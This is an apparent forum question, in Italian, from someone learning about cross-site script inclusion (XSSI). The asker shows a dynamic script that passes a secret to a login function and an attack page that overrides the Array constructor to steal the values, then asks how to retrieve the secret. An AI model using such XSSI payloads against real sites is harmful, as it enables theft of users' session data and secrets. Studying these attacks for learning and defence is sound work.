Sto imparando sugli attacchi XSSI e mi chiedo se è possibile utilizzare il seguente JS dinamico per accedere al contenuto.
Dinamic.js:
if (window.location.hostname === 'Demo.site.com' ){
updateLoginHeader('Nick', 'IWANT-THIS-SECRET'); }
L'attaccante può recuperare IWANT-THIS-SECRET usando il tag javascript? Stavo provando qualcosa come:
<script type="text/javascript">
var secrets;
Array = function() {
secrets = this;
};
</script>
<script src="https://example.com/Dinamic.js"type="text/javascript"></script>
<script type="text/javascript">
var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert('I stole your data: ' + yourData);
</script>
Qualche idea per recuperare IWANT-THIS-SECRET?